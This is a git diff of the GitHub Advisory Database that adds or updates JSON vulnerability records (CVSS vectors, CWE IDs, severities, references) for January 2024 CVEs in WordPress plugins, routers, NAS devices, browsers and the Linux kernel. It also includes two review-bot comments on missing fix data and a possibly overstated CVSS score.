@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h53r-v36g-3338", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22295" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RoboSoft Photo Gallery, Images, Slider in Rbs Image Gallery allows Stored XSS.This issue affects Photo Gallery, Images, Slider in Rbs Image Gallery: from n/a through 3.2.17.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22295" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/robo-gallery/wordpress-robo-gallery-plugin-3-2-17-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h56c-gcxc-4q77/GHSA-h56c-gcxc-4q77.json b/advisories/unreviewed/2024/01/GHSA-h56c-gcxc-4q77/GHSA-h56c-gcxc-4q77.json new file mode 100644 index 0000000000000..5fe23a3690854 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h56c-gcxc-4q77/GHSA-h56c-gcxc-4q77.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h56c-gcxc-4q77", + "modified": "2024-02-01T06:31:05Z", + "published": "2024-01-30T15:30:23Z", + "aliases": [ + "CVE-2024-24333" + ], + "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the desc parameter in the setWiFiAclRules function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24333" + }, + { + "type": "WEB", + "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/15/TOTOlink%20A3300R%20setWiFiAclRules.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h59p-5475-hhmr/GHSA-h59p-5475-hhmr.json b/advisories/unreviewed/2024/01/GHSA-h59p-5475-hhmr/GHSA-h59p-5475-hhmr.json index 55015d711ed2c..048ac39c43dce 100644 --- a/advisories/unreviewed/2024/01/GHSA-h59p-5475-hhmr/GHSA-h59p-5475-hhmr.json +++ b/advisories/unreviewed/2024/01/GHSA-h59p-5475-hhmr/GHSA-h59p-5475-hhmr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h59p-5475-hhmr", - "modified": "2024-01-23T15:30:57Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T15:30:57Z", "aliases": [ "CVE-2024-0741" ], "details": "An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ 
@@ -26,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00015.html" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html" + }, { "type": "WEB", "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/" @@ -41,9 +48,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h5f8-8ppp-6wxq/GHSA-h5f8-8ppp-6wxq.json b/advisories/unreviewed/2024/01/GHSA-h5f8-8ppp-6wxq/GHSA-h5f8-8ppp-6wxq.json index 3ba22d885bfb8..0eb456bedf754 100644 --- a/advisories/unreviewed/2024/01/GHSA-h5f8-8ppp-6wxq/GHSA-h5f8-8ppp-6wxq.json +++ b/advisories/unreviewed/2024/01/GHSA-h5f8-8ppp-6wxq/GHSA-h5f8-8ppp-6wxq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h5f8-8ppp-6wxq", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0809" ], "details": "Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h5vq-7cj5-594m/GHSA-h5vq-7cj5-594m.json b/advisories/unreviewed/2024/01/GHSA-h5vq-7cj5-594m/GHSA-h5vq-7cj5-594m.json index e759851a4ac8e..7b9ccc45b6934 100644 --- a/advisories/unreviewed/2024/01/GHSA-h5vq-7cj5-594m/GHSA-h5vq-7cj5-594m.json +++ b/advisories/unreviewed/2024/01/GHSA-h5vq-7cj5-594m/GHSA-h5vq-7cj5-594m.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h5vq-7cj5-594m", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-42144" ], "details": "Cleartext Transmission during initial setup in Shelly TRV 20220811-15234 v.2.1.8 allows a local attacker to obtain the Wi-Fi password.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-319" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T20:15:45Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h6xq-j8xx-3fv4/GHSA-h6xq-j8xx-3fv4.json b/advisories/unreviewed/2024/01/GHSA-h6xq-j8xx-3fv4/GHSA-h6xq-j8xx-3fv4.json index 2a1d706914862..beb574e4b9723 100644 --- a/advisories/unreviewed/2024/01/GHSA-h6xq-j8xx-3fv4/GHSA-h6xq-j8xx-3fv4.json +++ b/advisories/unreviewed/2024/01/GHSA-h6xq-j8xx-3fv4/GHSA-h6xq-j8xx-3fv4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h6xq-j8xx-3fv4", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0754" ], "details": "Some WASM source files could have caused a crash when loaded in devtools. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h739-gq5p-h6x4/GHSA-h739-gq5p-h6x4.json b/advisories/unreviewed/2024/01/GHSA-h739-gq5p-h6x4/GHSA-h739-gq5p-h6x4.json index 11f9e7cc4a037..5ef29c41caa3f 100644 
--- a/advisories/unreviewed/2024/01/GHSA-h739-gq5p-h6x4/GHSA-h739-gq5p-h6x4.json +++ b/advisories/unreviewed/2024/01/GHSA-h739-gq5p-h6x4/GHSA-h739-gq5p-h6x4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h739-gq5p-h6x4", - "modified": "2024-01-23T09:30:22Z", + "modified": "2024-01-30T03:30:30Z", "published": "2024-01-23T09:30:22Z", "aliases": [ "CVE-2024-23848" ], "details": "In the Linux kernel through 6.7.1, there is a use-after-free in cec_queue_msg_fh, related to drivers/media/cec/core/cec-adap.c and drivers/media/cec/core/cec-api.c.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T09:15:35Z" diff --git a/advisories/unreviewed/2024/01/GHSA-h7j4-hjmc-gj46/GHSA-h7j4-hjmc-gj46.json b/advisories/unreviewed/2024/01/GHSA-h7j4-hjmc-gj46/GHSA-h7j4-hjmc-gj46.json index b6da6962f8b2e..1e64ea4490a8d 100644 --- a/advisories/unreviewed/2024/01/GHSA-h7j4-hjmc-gj46/GHSA-h7j4-hjmc-gj46.json +++ b/advisories/unreviewed/2024/01/GHSA-h7j4-hjmc-gj46/GHSA-h7j4-hjmc-gj46.json @@ -36,6 +36,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-24" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2024/01/GHSA-h7m5-mp8f-v424/GHSA-h7m5-mp8f-v424.json b/advisories/unreviewed/2024/01/GHSA-h7m5-mp8f-v424/GHSA-h7m5-mp8f-v424.json index fd77886d374da..03ee06a8d655d 100644 --- a/advisories/unreviewed/2024/01/GHSA-h7m5-mp8f-v424/GHSA-h7m5-mp8f-v424.json +++ b/advisories/unreviewed/2024/01/GHSA-h7m5-mp8f-v424/GHSA-h7m5-mp8f-v424.json @@ -32,7 +32,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-284" + "CWE-284", + "CWE-863" ], "severity": "MODERATE", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2024/01/GHSA-h7wp-7q3v-7m5w/GHSA-h7wp-7q3v-7m5w.json b/advisories/unreviewed/2024/01/GHSA-h7wp-7q3v-7m5w/GHSA-h7wp-7q3v-7m5w.json new file mode 100644 index 0000000000000..ae5664bcc60dd --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h7wp-7q3v-7m5w/GHSA-h7wp-7q3v-7m5w.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7wp-7q3v-7m5w", + "modified": "2024-02-08T15:30:26Z", + "published": "2024-01-30T21:30:29Z", + "aliases": [ + "CVE-2023-5389" + ], + "details": "\nAn attacker could potentially exploit this vulnerability, leading to the ability to modify files on Honeywell Experion VirtualUOC and UOC . This exploit could be used to write a file that may result in unexpected behavior based on configuration changes or updating of files that could result in subsequent execution of a malicious application if triggered. Honeywell recommends updating to the most recent version of the product. See Honeywell Security Notification for recommendations on upgrading and versioning. ", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5389" + }, + { + "type": "WEB", + "url": "https://process.honeywell.com" + }, + { + "type": "WEB", + "url": "https://www.honeywell.com/us/en/product-security" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-749" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T20:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h86h-5wxq-fv48/GHSA-h86h-5wxq-fv48.json b/advisories/unreviewed/2024/01/GHSA-h86h-5wxq-fv48/GHSA-h86h-5wxq-fv48.json new file mode 100644 index 0000000000000..f49833bc158d8 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h86h-5wxq-fv48/GHSA-h86h-5wxq-fv48.json 
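Review bot: The Honeywell record (GHSA-h7wp-7q3v-7m5w) gives a consumer nothing to match against: `"affected"` is empty, the `details` text only says to update to "the most recent version" and defers to a "Honeywell Security Notification", and both WEB references (`https://process.honeywell.com`, `https://www.honeywell.com/us/en/product-security`) are site landing pages rather than that notification. With a 9.1 vector (AV:N/PR:N, I:H/A:H) and CWE-749 describing what reads as an unauthenticated file write on Experion VirtualUOC/UOC, anyone triaging from this entry cannot tell which versions are exposed or fixed. The record mirrors NVD, so the data fix belongs upstream, but the missing piece is a reference to the specific notification and the fixed version it names; I would not guess at either here. The leading `\n` and trailing space inside `details` also look like copy artifacts worth trimming if the sync tooling normalizes text.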
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h86h-5wxq-fv48", + "modified": "2024-01-29T00:30:17Z", + "published": "2024-01-29T00:30:17Z", + "aliases": [ + "CVE-2024-0988" + ], + "details": "A vulnerability classified as critical was found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this vulnerability is the function checklogin of the file /application/index/common.php. The manipulation of the argument App_User_id/App_user_Token leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-252253 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0988" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/2dBOnquxgCDl" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252253" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252253" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-h994-99h2-49qc/GHSA-h994-99h2-49qc.json b/advisories/unreviewed/2024/01/GHSA-h994-99h2-49qc/GHSA-h994-99h2-49qc.json new file mode 100644 index 0000000000000..a2c19381b5a49 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-h994-99h2-49qc/GHSA-h994-99h2-49qc.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h994-99h2-49qc", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-30970" + ], + "details": "Gotham Table service and Forward App were found to be vulnerable to a Path traversal issue allowing an authenticated user to read arbitrary files on the file system.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30970" + }, + { + "type": "WEB", + "url": "https://palantir.safebase.us/?tcuUid=69be99ef-ad24-4339-9017-c8bf70789c72" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22", + "CWE-36" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hc66-p838-6xfp/GHSA-hc66-p838-6xfp.json b/advisories/unreviewed/2024/01/GHSA-hc66-p838-6xfp/GHSA-hc66-p838-6xfp.json index 00d8e4dded118..320c95cf93946 100644 --- a/advisories/unreviewed/2024/01/GHSA-hc66-p838-6xfp/GHSA-hc66-p838-6xfp.json +++ b/advisories/unreviewed/2024/01/GHSA-hc66-p838-6xfp/GHSA-hc66-p838-6xfp.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-287" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-hc6c-m8v3-634f/GHSA-hc6c-m8v3-634f.json b/advisories/unreviewed/2024/01/GHSA-hc6c-m8v3-634f/GHSA-hc6c-m8v3-634f.json new file mode 100644 index 0000000000000..a62891c3841fe --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hc6c-m8v3-634f/GHSA-hc6c-m8v3-634f.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hc6c-m8v3-634f", + "modified": "2024-02-06T15:32:04Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-22158" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PeepSo Community by PeepSo – Social Network, Membership, Registration, User Profiles allows Stored XSS.This issue affects Community by PeepSo – Social Network, Membership, Registration, User Profiles: from n/a before 6.3.1.0.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22158" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/peepso-photos/wordpress-peepso-photos-add-on-plugin-6-3-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hcj6-8f5v-24x9/GHSA-hcj6-8f5v-24x9.json b/advisories/unreviewed/2024/01/GHSA-hcj6-8f5v-24x9/GHSA-hcj6-8f5v-24x9.json new file mode 100644 index 0000000000000..04e233198f1f4 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hcj6-8f5v-24x9/GHSA-hcj6-8f5v-24x9.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hcj6-8f5v-24x9", + "modified": "2024-01-31T12:30:17Z", + "published": "2024-01-31T12:30:17Z", + "aliases": [ + "CVE-2024-22290" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in AboZain,O7abeeb,UnitOne Custom Dashboard Widgets allows Cross-Site Scripting (XSS).This issue affects Custom Dashboard Widgets: from n/a through 1.3.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22290" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/custom-dashboard-widgets/wordpress-custom-dashboard-widgets-plugin-1-3-1-csrf-to-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T12:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hcpx-fjcv-rp6j/GHSA-hcpx-fjcv-rp6j.json b/advisories/unreviewed/2024/01/GHSA-hcpx-fjcv-rp6j/GHSA-hcpx-fjcv-rp6j.json index 5516d23915722..70353e104d822 100644 --- a/advisories/unreviewed/2024/01/GHSA-hcpx-fjcv-rp6j/GHSA-hcpx-fjcv-rp6j.json +++ b/advisories/unreviewed/2024/01/GHSA-hcpx-fjcv-rp6j/GHSA-hcpx-fjcv-rp6j.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hcpx-fjcv-rp6j", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52093" ], "details": "An exposed dangerous function vulnerability in the Trend Micro Apex One agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hf79-3hfm-mgmr/GHSA-hf79-3hfm-mgmr.json b/advisories/unreviewed/2024/01/GHSA-hf79-3hfm-mgmr/GHSA-hf79-3hfm-mgmr.json index d0563b98c8a99..fde8dbc5a56a0 100644 --- a/advisories/unreviewed/2024/01/GHSA-hf79-3hfm-mgmr/GHSA-hf79-3hfm-mgmr.json +++ b/advisories/unreviewed/2024/01/GHSA-hf79-3hfm-mgmr/GHSA-hf79-3hfm-mgmr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hf79-3hfm-mgmr", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-46892" ], "details": "The radio frequency communication protocol being used by Meross MSH30Q 4.5.23 is vulnerable to replay attacks, allowing attackers to record and replay previously captured communication to execute unauthorized commands or actions (e.g., thermostat's temperature).", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-294" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hgqh-qj43-xfmf/GHSA-hgqh-qj43-xfmf.json b/advisories/unreviewed/2024/01/GHSA-hgqh-qj43-xfmf/GHSA-hgqh-qj43-xfmf.json new file mode 100644 index 0000000000000..fbb2d78a597af --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hgqh-qj43-xfmf/GHSA-hgqh-qj43-xfmf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hgqh-qj43-xfmf", + "modified": "2024-01-31T12:30:17Z", + "published": "2024-01-31T12:30:17Z", + "aliases": [ + "CVE-2023-50356" + ], + "details": "SSL connections to NOVELL and Synology LDAP server are vulnerable to a man-in-the-middle attack due to improper certificate validation in AREAL Topkapi Vision (Server). This allows a remote unauthenticated attacker to gather sensitive information and prevent valid users from login.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50356" + }, + { + "type": "WEB", + "url": "https://www.areal-topkapi.com/en/services/security-bulletins" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T11:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hgrc-r3ff-wxfq/GHSA-hgrc-r3ff-wxfq.json b/advisories/unreviewed/2024/01/GHSA-hgrc-r3ff-wxfq/GHSA-hgrc-r3ff-wxfq.json index dbabc79ff35a1..d25077743f99c 100644 --- a/advisories/unreviewed/2024/01/GHSA-hgrc-r3ff-wxfq/GHSA-hgrc-r3ff-wxfq.json +++ b/advisories/unreviewed/2024/01/GHSA-hgrc-r3ff-wxfq/GHSA-hgrc-r3ff-wxfq.json 
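Review bot: The AREAL Topkapi record (GHSA-hgqh-qj43-xfmf) carries `"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H"` and `"severity": "CRITICAL"`, yet its own description is a man-in-the-middle attack on the LDAP-over-SSL connection, which the CVSS v3.1 specification uses as its example of Attack Complexity High (the attacker must first inject themselves into the network path). With AC:H the same vector scores 7.4 (HIGH) rather than 9.1, so consumers sorting by the `severity` field will over-prioritize this entry unless the vendor bulletin shows the MITM position is trivially obtained, which the visible text does not say. The vector is inherited from NVD, so this is a caveat for readers rather than a value to hand-edit; if the database allows annotations, a note that the score assumes AC:L would help.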
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hgrc-r3ff-wxfq", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-36177" ], "details": "An issue was discovered in badaix Snapcast version 0.27.0, allows remote attackers to execute arbitrary code and gain sensitive information via crafted request in JSON-RPC-API.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-hgw6-wf28-c5x3/GHSA-hgw6-wf28-c5x3.json b/advisories/unreviewed/2024/01/GHSA-hgw6-wf28-c5x3/GHSA-hgw6-wf28-c5x3.json new file mode 100644 index 0000000000000..6347170711b8f --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hgw6-wf28-c5x3/GHSA-hgw6-wf28-c5x3.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hgw6-wf28-c5x3", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-5372" + ], + "details": "The post-authentication command injection vulnerability in Zyxel NAS326 firmware versions through V5.21(AAZF.15)C0 and NAS542 firmware versions through V5.21(ABAG.12)C0 could allow an authenticated attacker with administrator privileges to execute some operating system (OS) commands by sending a crafted query parameter attached to the URL of an affected device’s web management interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5372" + }, + { + "type": "WEB", + "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-post-authentication-command-injection-vulnerability-in-nas-products-01-30-2024" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hgx4-v6hr-x7qw/GHSA-hgx4-v6hr-x7qw.json b/advisories/unreviewed/2024/01/GHSA-hgx4-v6hr-x7qw/GHSA-hgx4-v6hr-x7qw.json new file mode 100644 index 0000000000000..6d172e1e98f63 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hgx4-v6hr-x7qw/GHSA-hgx4-v6hr-x7qw.json 
@@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hgx4-v6hr-x7qw", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0989" + ], + "details": "A vulnerability, which was classified as problematic, has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this issue is the function del_sn_db of the file /application/index/controller/Service.php. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-252254 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0989" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/XKxaJTphW6PB" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252254" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252254" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22", + "CWE-24" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T01:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-hj6r-9q35-32hf/GHSA-hj6r-9q35-32hf.json b/advisories/unreviewed/2024/01/GHSA-hj6r-9q35-32hf/GHSA-hj6r-9q35-32hf.json new file mode 100644 index 0000000000000..a69492c735b3f --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-hj6r-9q35-32hf/GHSA-hj6r-9q35-32hf.json 
